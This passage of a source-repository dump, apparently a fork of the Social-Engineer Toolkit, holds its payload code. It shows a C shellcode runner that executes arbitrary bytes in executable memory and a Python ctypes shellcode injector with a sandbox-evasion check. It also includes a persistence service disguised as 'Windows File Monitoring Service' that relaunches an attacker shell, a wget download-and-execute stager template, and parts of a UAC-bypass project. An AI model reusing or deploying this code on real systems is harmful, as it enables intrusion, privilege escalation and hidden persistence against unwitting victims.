to this: Multi-threaded (/MT) 14 | Rebuild. 15 | */ 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | DWORD WINAPI exec_payload(LPVOID lpParameter); 24 | #if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32) 25 | #else 26 | #include 27 | #include 28 | #include 29 | #endif 30 | 31 | int sys_bineval(char *argv); 32 | 33 | int main(int argc, char *argv[]) 34 | { 35 | if (argc < 2) { 36 | exit(-1); 37 | } 38 | 39 | sys_bineval(argv[1]); 40 | 41 | exit(0); 42 | } 43 | 44 | int sys_bineval(char *argv) 45 | { 46 | size_t len; 47 | 48 | #if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32) 49 | int hugs; 50 | char *code; 51 | #else 52 | int *addr; 53 | size_t page_size; 54 | hugs_t hugs; 55 | #endif 56 | 57 | len = (size_t)strlen(argv); 58 | 59 | #if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32) 60 | // allocate a +rwx memory page 61 | code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 62 | 63 | // copy over the shellcode 64 | strncpy(code, argv, len); 65 | 66 | // execute it by ASM code defined in exec_payload function 67 | WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &hugs), INFINITE); 68 | #else 69 | hugs = fork(); 70 | if(hugs<0) 71 | return 1; 72 | 73 | if(hugs==0) 74 | { 75 | page_size = (size_t)sysconf(_SC_PAGESIZE)-1; // get page size 76 | page_size = (len+page_size) & ~(page_size); // align to page boundary 77 | 78 | // mmap an +rwx memory page 79 | addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, 0, 0); 80 | 81 | if (addr == MAP_FAILED) 82 | return 1; 83 | 84 | // copy over the shellcode 85 | strncpy((char *)addr, argv, len); 86 | 87 | // execute it 88 | ((void (*)(void))addr)(); 89 | } 90 | 91 | if(hugs>0) 92 | waitpid(hugs, 0, WNOHANG); 93 | #endif 94 | 95 | return 0; 96 | } 97 | 98 | #if defined(_WIN64) 99 | void __exec_payload(LPVOID); 100 | 101 | DWORD WINAPI exec_payload(LPVOID lpParameter) 102 | { 103 | __try 104 | { 105 | __exec_payload(lpParameter); 106 | } 107 | __except(EXCEPTION_EXECUTE_HANDLER) 108 | { 109 | } 110 | 111 | return 0; 112 | } 113 | #elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32) 114 | DWORD WINAPI exec_payload(LPVOID lpParameter) 115 | { 116 | __try 117 | { 118 | __asm 119 | { 120 | mov eax, [lpParameter] 121 | call eax 122 | } 123 | } 124 | __except(EXCEPTION_EXECUTE_HANDLER) 125 | { 126 | } 127 | 128 | return 0; 129 | } 130 | #endif 131 | 132 | -------------------------------------------------------------------------------- /src/payloads/powershell/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/powershell/__init__.py -------------------------------------------------------------------------------- /src/payloads/ratte/cygwin1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/ratte/cygwin1.dll -------------------------------------------------------------------------------- /src/payloads/ratte/ratte.binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/ratte/ratte.binary -------------------------------------------------------------------------------- /src/payloads/ratte/ratteserver: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/ratte/ratteserver -------------------------------------------------------------------------------- /src/payloads/ratte/ratteserver.binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/ratte/ratteserver.binary -------------------------------------------------------------------------------- /src/payloads/set_payloads/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/__init__.py -------------------------------------------------------------------------------- /src/payloads/set_payloads/downloader.posix: -------------------------------------------------------------------------------- 1 | #!/usr/bin/sh 2 | wget URLHERE 3 | chmod +x FILENAMEHERE 4 | ./ FILENAMEHERE 5 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/downloader.windows: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/downloader.windows -------------------------------------------------------------------------------- /src/payloads/set_payloads/http_shell.binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/http_shell.binary -------------------------------------------------------------------------------- /src/payloads/set_payloads/multi_pyinjector.binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/multi_pyinjector.binary -------------------------------------------------------------------------------- /src/payloads/set_payloads/persistence.binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/persistence.binary -------------------------------------------------------------------------------- /src/payloads/set_payloads/persistence.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | ##################################################################################################################### 4 | # 5 | # Social-Engineer Toolkit Persistence Service 6 | # 7 | # Right now this is a pretty lame attempt at a service but will grow over time. The text file it reads in from isn't 8 | # really a good idea, but it's a start. 9 | # 10 | ##################################################################################################################### 11 | # 12 | # ex usage: persistence.exe install, start, stop, remove 13 | # 14 | # You can see output of this program running python site-packages\win32\lib\win32traceutil for debugging 15 | # 16 | ##################################################################################################################### 17 | 18 | import win32service 19 | import win32serviceutil 20 | import win32event 21 | import win32evtlogutil 22 | import win32traceutil 23 | import servicemanager 24 | import winerror 25 | import time 26 | import sys 27 | import os 28 | import subprocess 29 | 30 | class aservice(win32serviceutil.ServiceFramework): 31 | _svc_name_ = "windows_monitoring" 32 | _svc_display_name_ = "Windows File Monitoring Service" 33 | _svc_deps_ = ["EventLog"] 34 | 35 | def __init__(self,args): 36 | win32serviceutil.ServiceFramework.__init__(self,args) 37 | self.hWaitStop=win32event.CreateEvent(None, 0, 0, None) 38 | self.isAlive=True 39 | 40 | def SvcStop(self): 41 | # tell Service Manager we are trying to stop (required) 42 | self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING) 43 | # set the event to call 44 | win32event.SetEvent(self.hWaitStop) 45 | self.isAlive=False 46 | 47 | def SvcDoRun(self): 48 | import servicemanager 49 | # wait for beeing stopped ... 50 | self.timeout=1000 # In milliseconds (update every second) 51 | while self.isAlive: 52 | # wait for service stop signal, if timeout, loop again 53 | rc=win32event.WaitForSingleObject(self.hWaitStop, self.timeout) 54 | # expand the filesystem path 55 | windir=os.environ['WINDIR'] 56 | # grab homepath 57 | homedir_path = os.getenv("SystemDrive") 58 | homedir_path = homedir_path + "\\Program Files\\Common Files\\" 59 | # pull the windows operating system version number 60 | windows_version = sys.getwindowsversion()[2] 61 | # pull integer of version number 62 | windows_version = int(windows_version) 63 | # windows XP and below 64 | if windows_version < 3791: 65 | fileopen=file("%s\\system32\\isjxwqjs" % (windir), "r") 66 | # windows 7, vista, 2008, etc. that might have UAC so we write to AppData instead 67 | if windows_version > 3791: 68 | fileopen=file("%s\\isjxwqjs" % (homedir_path), "r") 69 | for line in fileopen: 70 | # pull set-path, this is pulled from interactive shell and written when persistence is called 71 | set_path=line.rstrip() 72 | # specify filename to execute the SET interactive shell 73 | subprocess.Popen('%s' % (set_path), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) 74 | # sleep 30 mins 75 | time.sleep(1800) 76 | self.ReportServiceStatus(win32service.SERVICE_STOPPED) 77 | return 78 | 79 | if __name__ == '__main__': 80 | 81 | # f its called with arguments then run 82 | if len(sys.argv) == 1: 83 | try: 84 | evtsrc_dll = os.path.abspath(servicemanager.__file__) 85 | servicemanager.PrepareToHostSingle(aservice) 86 | servicemanager.Initialize('aservice', evtsrc_dll) 87 | servicemanager.StartServiceCtrlDispatcher() 88 | except win32service.error, details: 89 | if details[0] == winerror.ERROR_FAILED_SERVICE_CONTROLLER_CONNECT: 90 | win32serviceutil.usage() 91 | else: 92 | win32serviceutil.HandleCommandLine(aservice) 93 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/pyinjector.binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/pyinjector.binary -------------------------------------------------------------------------------- /src/payloads/set_payloads/pyinjector_args.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import ctypes 3 | import sys 4 | import multiprocessing 5 | 6 | # Written by Dave Kennedy (ReL1K) @ TrustedSec.com 7 | # Injects shellcode into memory through Python and ctypes 8 | # 9 | # Initial awesome code and credit found here: 10 | # http://www.debasish.in/2012_04_01_archive.html 11 | 12 | # added sandbox evasion here - most sandboxes use only 1 core 13 | if multiprocessing.cpu_count() < 2: 14 | exit() 15 | 16 | # see if we specified shellcode 17 | try: 18 | sc = sys.argv[1] 19 | 20 | # if we didn't specify a param 21 | except IndexError: 22 | sys.exit() 23 | 24 | # need to code the input into the right format through string escape 25 | sc = sc.decode("string_escape") 26 | 27 | # convert to bytearray 28 | sc = bytearray(sc) 29 | 30 | # use types windll.kernel32 for virtualalloc reserves region of pages in virtual address space 31 | ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), 32 | ctypes.c_int(len(sc)), 33 | ctypes.c_int(0x3000), 34 | ctypes.c_int(0x40)) 35 | 36 | # use virtuallock to lock region for physical address space 37 | ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), 38 | ctypes.c_int(len(sc))) 39 | 40 | # read in the buffer 41 | buf = (ctypes.c_char * len(sc)).from_buffer(sc) 42 | 43 | # moved the memory in 4 byte blocks 44 | ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), 45 | buf, 46 | ctypes.c_int(len(sc))) 47 | # launch in a thread 48 | ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), 49 | ctypes.c_int(0), 50 | ctypes.c_int(ptr), 51 | ctypes.c_int(0), 52 | ctypes.c_int(0), 53 | ctypes.pointer(ctypes.c_int(0))) 54 | # waitfor singleobject 55 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1)) 56 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/readme.txt: -------------------------------------------------------------------------------- 1 | download.c is the inital stager payload that downloads the shell.exe payload. 2 | 3 | listener.py is the SET listener. 4 | 5 | shell.py is the shell, it uses pyinstaller for byte compilation then upx for packing of size. 6 | 7 | persistence.py is the python based service 8 | 9 | Edit each file if you want to see how to byte compile, what modules are required and what each one is doing. 10 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/shell.binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/shell.binary -------------------------------------------------------------------------------- /src/payloads/set_payloads/shell.linux: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/shell.linux -------------------------------------------------------------------------------- /src/payloads/set_payloads/shell.osx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/shell.osx -------------------------------------------------------------------------------- /src/payloads/set_payloads/shell.windows: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/shell.windows -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/CMMN.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #include 6 | 7 | // 8 | // By Pavel 9 | // 10 | // This class is used for holding some data in the memory that can be accessed 11 | // from any saparate process in the system by its name. 12 | // It uses memeory mapped files with fixed size sections. Size is enough to hold 13 | // as many chars as system supports for file paths. 14 | // 15 | // Once instance was created, it can be accessed from the another progect by the name. 16 | // This shared object will be cleaned up when the last instance of this class will be destroyed 17 | // across whole system. 18 | // 19 | // Generally, it is used following: 20 | // 1. Create the first instance, set up data, keep it alive forever 21 | // 2. Access to created object by its name from another prject by creating 22 | // temporary instance of that object. After you dont need this object, destroy it. 23 | // 24 | 25 | class CInterprocessStorage { 26 | public: 27 | static const size_t MaxSize = MAX_PATH; 28 | static const size_t MaxCount = MAX_PATH / sizeof(TCHAR); 29 | 30 | // 31 | // Creates initial named object or opens existing, incrementing its reference count. 32 | // Resets all object's contents. 33 | // 34 | static CInterprocessStorage *Create( const TCHAR * Name ); 35 | // 36 | // Creates initial named object or opens existing, incrementing its reference count, 37 | // sets its value to the specified string 38 | // 39 | static CInterprocessStorage *Create( const TCHAR * Name, std::wstring& String ); 40 | 41 | // 42 | // Opens existing named object. Does not modify its data. 43 | // 44 | static CInterprocessStorage *Open( const TCHAR * Name ); 45 | 46 | // 47 | // Queries object's name. 48 | // 49 | std::wstring GetName(); 50 | 51 | // 52 | // Queries object's value 53 | // 54 | void GetString( std::wstring& String ); 55 | 56 | // 57 | // Tries to get named object's value, accessing one by the name. 58 | // 59 | static bool GetString( const TCHAR *Name, std::wstring& String ); 60 | 61 | // 62 | // Sets object's Value 63 | // 64 | void SetString( std::wstring& String ); 65 | 66 | ~CInterprocessStorage(); 67 | 68 | private: 69 | const HANDLE _hMapping; 70 | const LPVOID _pBase; 71 | const TCHAR *_Name; 72 | CInterprocessStorage( const TCHAR *Name, HANDLE Mapping, LPVOID Base ); 73 | }; 74 | 75 | // 76 | // Logs data to file. 77 | // Log takes place ony if one special file exists. File is named as its hosting application 78 | // appended by .debug 79 | // Example: Code runs in the explorer.exe => log will be allowed if near the exe 80 | // will be placed file explorer.exe.debug 81 | // 82 | // It uses mutual execution to prevent unreadable content of the log file. 83 | // Log file has path = %temp%w7e.og 84 | // 85 | // FILE_FLAG_WRITE_THROUGH flag is used to prevent log to be unsaved if application crashed. 86 | // 87 | class CLogger { 88 | public: 89 | static void LogLine( std::wstring& Text ); 90 | static void LogLine( const TCHAR *Text ); 91 | static void LogLine( ); 92 | static void Log( std::wstring& Text ); 93 | static void Log( const TCHAR *Text ); 94 | static void Log( const TCHAR Char ); 95 | static void Reset( ); 96 | 97 | private: 98 | static std::wstring GetPath(); 99 | }; 100 | 101 | // 102 | // Formats system error codes that were obtained by calling GetLastError. 103 | // 104 | class CError { 105 | public: 106 | static std::wstring Format( DWORD ErrorCode ); 107 | static std::wstring Format( DWORD ErrorCode, const TCHAR *Title, const TCHAR *API ); 108 | }; 109 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Redirector.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | 3 | #include "CMMN.h" 4 | #include "Redirector.h" 5 | #include 6 | 7 | const TCHAR *STDIn_PIPE = TEXT("\\\\.\\pipe\\TIOR_In"); 8 | const TCHAR *STDOut_PIPE = TEXT("\\\\.\\pipe\\TIOR_Out"); 9 | const TCHAR *STDErr_PIPE = TEXT("\\\\.\\pipe\\TIOR_Err"); 10 | 11 | DWORD WINAPI Redirector( LPVOID Parameter ) 12 | { 13 | assert( Parameter ); 14 | TRedirectorPair *pair = reinterpret_cast( Parameter ); 15 | 16 | CLogger::Log( TEXT("Hello redirector thread: ") ); 17 | CLogger::LogLine( pair->Name ); 18 | 19 | CHAR read_buff[2]; 20 | DWORD nBytesRead,nBytesWrote; 21 | 22 | bool was_0d = false; 23 | bool error = false; 24 | while ( ! error ) 25 | { 26 | if( ! ReadFile( pair->Source, read_buff, 1, &nBytesRead, NULL) ) 27 | { 28 | CLogger::LogLine( 29 | CError::Format( 30 | GetLastError(), 31 | pair->Name.c_str(), 32 | TEXT("ReadFile") ) ); 33 | error = true && (!pair->KeepAlive); 34 | break; 35 | } 36 | 37 | if ( pair->Linux ) 38 | { 39 | if ( ! was_0d ) 40 | { 41 | if ( read_buff[0] == 0xa ) 42 | { 43 | read_buff[0] = 0xd; 44 | read_buff[1] = 0xa; 45 | nBytesRead = 2; 46 | } 47 | } 48 | was_0d = read_buff[nBytesRead - 1] == 0x0d; 49 | } 50 | 51 | for ( DWORD i = 0; i < nBytesRead; i++ ) 52 | { 53 | if ( pair->DestinationConsole ) 54 | { 55 | // 56 | // Emulate console input. 57 | // 58 | 59 | INPUT_RECORD inp = {0}; 60 | inp.EventType = KEY_EVENT; 61 | inp.Event.KeyEvent.uChar.AsciiChar = read_buff[i]; 62 | inp.Event.KeyEvent.wRepeatCount = 1; 63 | inp.Event.KeyEvent.wVirtualKeyCode = 0; 64 | inp.Event.KeyEvent.wVirtualScanCode = 0; 65 | inp.Event.KeyEvent.bKeyDown = TRUE; 66 | inp.Event.KeyEvent.dwControlKeyState = 0; 67 | 68 | if ( ! WriteConsoleInput( pair->Destination, &inp, 1, &nBytesWrote) ) 69 | { 70 | CLogger::LogLine( 71 | CError::Format( 72 | GetLastError(), 73 | pair->Name.c_str(), 74 | TEXT("WriteConsoleInput") ) ); 75 | error = true && (!pair->KeepAlive); 76 | break; 77 | } 78 | } 79 | else 80 | { 81 | if ( ! WriteFile( pair->Destination, &read_buff[i], 1, &nBytesWrote, NULL) ) 82 | { 83 | CLogger::LogLine( 84 | CError::Format( 85 | GetLastError(), 86 | pair->Name.c_str(), 87 | TEXT("WriteFile") ) ); 88 | error = true && (!pair->KeepAlive); 89 | break; 90 | } 91 | } 92 | } 93 | } 94 | 95 | CLogger::Log( TEXT("Bye redirector thread: ") ); 96 | CLogger::LogLine( pair->Name ); 97 | return EXIT_SUCCESS; 98 | } 99 | 100 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Redirector.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | #include 7 | 8 | #include 9 | 10 | // 11 | // By Pavel 12 | 13 | // 14 | // Defines names of pipes that can be accessed by name for redirecting IO. 15 | // 16 | const extern TCHAR *STDIn_PIPE; 17 | const extern TCHAR *STDOut_PIPE; 18 | const extern TCHAR *STDErr_PIPE; 19 | 20 | // 21 | // Structure that is passed to newly created thread. 22 | // Defines how to redirect IO 23 | // 24 | typedef struct _TRedirectorPair { 25 | HANDLE Source; 26 | HANDLE Destination; 27 | // 28 | // Uses directly Console IO instead of ReadFile and WriteFile 29 | // 30 | bool DestinationConsole; 31 | HANDLE Thread; 32 | // 33 | // If true, prevent thread's exit on any IO error. 34 | // 35 | bool KeepAlive; 36 | std::wstring Name; 37 | // 38 | // Appends 0x0A which is the one line terminator for linux with 0x0D. ( \r \n escapes) 39 | // 40 | bool Linux; 41 | }TRedirectorPair; 42 | 43 | DWORD WINAPI Redirector( LPVOID Parameter ); 44 | 45 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/TIOR/TIOR.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | 26 | 27 | Source Files 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/TIOR/TIOR.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/TIOR/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // TIOR.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/TIOR/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | #include 17 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/TIOR/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 11.00 3 | # Visual Studio 2010 4 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{BB654285-1131-415D-B796-21045D32DF87}" 5 | ProjectSection(SolutionItems) = preProject 6 | Win7Elevate_v2_read_me.txt = Win7Elevate_v2_read_me.txt 7 | EndProjectSection 8 | EndProject 9 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TIOR", "TIOR\TIOR.vcxproj", "{B36517F4-984C-422C-ADF9-85D5ACD4E30B}" 10 | EndProject 11 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Win7ElevateDll", "Win7ElevateDll\Win7ElevateDll.vcxproj", "{A1814C92-4DA6-440C-811E-86016AB7433A}" 12 | EndProject 13 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Win7Elevate", "Win7Elevate\Win7Elevate.vcxproj", "{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}" 14 | ProjectSection(ProjectDependencies) = postProject 15 | {A1814C92-4DA6-440C-811E-86016AB7433A} = {A1814C92-4DA6-440C-811E-86016AB7433A} 16 | {B36517F4-984C-422C-ADF9-85D5ACD4E30B} = {B36517F4-984C-422C-ADF9-85D5ACD4E30B} 17 | EndProjectSection 18 | EndProject 19 | Global 20 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 21 | Debug|Pocket PC 2003 (ARMV4) = Debug|Pocket PC 2003 (ARMV4) 22 | Debug|Win32 = Debug|Win32 23 | Debug|x64 = Debug|x64 24 | Release|Pocket PC 2003 (ARMV4) = Release|Pocket PC 2003 (ARMV4) 25 | Release|Win32 = Release|Win32 26 | Release|x64 = Release|x64 27 | EndGlobalSection 28 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 29 | {B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32 30 | {B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.ActiveCfg = Debug|Win32 31 | {B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.Build.0 = Debug|Win32 32 | {B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.ActiveCfg = Debug|x64 33 | {B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32 34 | {B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.ActiveCfg = Release|Win32 35 | {B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.Build.0 = Release|Win32 36 | {B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.ActiveCfg = Release|x64 37 | {B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.Build.0 = Release|x64 38 | {A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32 39 | {A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.ActiveCfg = Debug|Win32 40 | {A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.Build.0 = Debug|Win32 41 | {A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.ActiveCfg = Debug|x64 42 | {A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32 43 | {A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.ActiveCfg = Release|Win32 44 | {A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.Build.0 = Release|Win32 45 | {A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.ActiveCfg = Release|x64 46 | {A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.Build.0 = Release|x64 47 | {10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32 48 | {10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.ActiveCfg = Debug|Win32 49 | {10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.Build.0 = Debug|Win32 50 | {10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.ActiveCfg = Debug|x64 51 | {10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32 52 | {10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.ActiveCfg = Release|Win32 53 | {10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.Build.0 = Release|Win32 54 | {10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.ActiveCfg = Release|x64 55 | {10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.Build.0 = Release|x64 56 | EndGlobalSection 57 | GlobalSection(SolutionProperties) = preSolution 58 | HideSolutionNode = FALSE 59 | EndGlobalSection 60 | EndGlobal 61 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate/Resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by Win7Elevate.rc 4 | // 5 | #define IDD_EMBEDDED_DLL 110 6 | #define IDD_EMBEDDED_TIOR 111 7 | 8 | // Next default values for new objects 9 | // 10 | #ifdef APSTUDIO_INVOKED 11 | #ifndef APSTUDIO_READONLY_SYMBOLS 12 | #define _APS_NO_MFC 1 13 | #define _APS_NEXT_RESOURCE_VALUE 139 14 | #define _APS_NEXT_COMMAND_VALUE 32771 15 | #define _APS_NEXT_CONTROL_VALUE 1000 16 | #define _APS_NEXT_SYMED_VALUE 111 17 | #endif 18 | #endif 19 | -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate/Win7Elevate.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/set_payloads/uac_bypass/source/Win7Elevate/Win7Elevate.cpp -------------------------------------------------------------------------------- /src/payloads/set_payloads/uac_bypass/source/Win7Elevate/Win7Elevate.rc: -------------------------------------------------------------------------------- 1 | // Microsoft Visual C++ generated resource script. 2 | // 3 | #include "resource.h" 4 | 5 | #define APSTUDIO_READONLY_SYMBOLS 6 | ///////////////////////////////////////////////////////////////////////////// 7 | // 8 | // Generated from the TEXTINCLUDE 2 resource. 9 | // 10 | #ifndef APSTUDIO_INVOKED 11 | #include "targetver.h" 12 | #endif 13 | #define APSTUDIO_HIDDEN_SYMBOLS 14 | #include "windows.h" 15 | #undef APSTUDIO_HIDDEN_SYMBOLS 16 | 17 | ///////////////////////////////////////////////////////////////////////////// 18 | #undef APSTUDIO_READONLY_SYMBOLS 19 | 20 | ///////////////////////////////////////////////////////////////////////////// 21 | // English (U.S.) resources 22 | 23 | #if 